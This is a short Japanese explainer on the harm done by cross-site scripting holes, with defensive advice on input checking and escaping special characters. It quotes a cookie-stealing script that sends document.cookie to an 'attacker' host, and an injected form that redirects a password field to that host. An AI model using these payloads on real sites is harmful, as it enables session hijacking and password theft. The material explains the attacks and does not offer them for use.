XSSセキュリティホールによる起こり得る被害
●cookieの盗難
これがXSSの被害としては一般に広く知られている。「document.location="http://attacker/cookie.cgi?
cookie="+document.cookie;」というスクリプトを実行されると、攻撃者サイトのcookie.cgiにユーザーのcookieを
含んだ形でアクセスすることになる。攻撃者サイトのWebサーバのログにも残るだろうし、cookieデータを受けたCGI
ではどんな処理でもできることになる。
cookieに個人情報やセッションIDのような情報だけを格納している場合は、cookieのセッションIDだけでユーザー認
証を行っている場合は危険である。
●ページの改ざん
<form action="regist.cgi">
<input type="hidden" name="sample" value="○○">
パスワード: <input type="text" name="name" value="password">
<input type="submit">
</form>
<form action="regist.cgi">
<input type="hidden" name="sample" value=""></form><form action="http://attacker/regist.cgi">
パスワード: <input type="text" name="name" value="password">
<input type="submit">
</form>
●HTTPおよびHTML文内の特殊文字の対策
XSS対策の最初の一歩は「入力チェック」
入力チェックの落とし穴
すべてのパラメータをチェックをする
毎回チェックをする
特殊文字のサニタイジング(無害化)
文字をサニタイジングするには、それぞれ「<」「>」「&」に変換する。
分享到:
相关推荐
最新版で学ぶwebpack入门 ICS MEDIA“”のサンプルコード集です。ReactやBabelなど30以上の构成のサンプルを用意しています。 各フォルダーの构成は常に最新を保っているので,安心して参照してくだ...スタイルシート编
Cadence 16.6新功能连载二,欢迎下载
框架设计学习资料 连载 连载不断更新框架设计框架设计学习资料 连载 连载不断更新学习资料 连载 连载不断更新
陶显芳老师的《开关电源设计技巧》连载二pdf,陶显芳老师的《开关电源设计技巧》连载二.pdf
GAMP 5 第二版 中英文翻译连载
高速设计的三座大山连载二之串联电阻.docx
ご発表いただいた资料はOpenStandiaのWebサイトからリンクを贴らせていただく场合があります。ご了承ください。 MongoDB最初の1歩 を一通り読むと良いと思います。とりあえず手を动かしたい人は,のstep01をやってみ...
Rasa对话机器人连载二十二 第127课:Rasa对话机器人Debugging项目实战之教育领域项目微服务调用全生命周期调试(一).pdf
白藜芦醇和锌离子心肌保护作用的联系与进展(连载二)
Rasa对话机器人连载二十三 第127课:Rasa对话机器人Debugging项目实战之教育领域项目微服务调用全生命周期调试(二).pdf
Rasa对话机器人连载二十七 第128课:Rasa对话机器人Debugging项目实战之教育领域综合调试实战解密(二).pdf
用脑拿订单—销售中的全脑博弈(连载二).pdf
access罗斯文数据库学习连载 access罗斯文数据库学习连载
Android核心基础,非常好的一份资料,新手非常容易上手,讲的非常好
[新闻文章]新飞库电子书连载系统 [新闻文章]新飞库电子书连载系统
利用spc3开发智能从站源码讲解(连载一) 利用spc3开发智能从站源码讲解(连载一)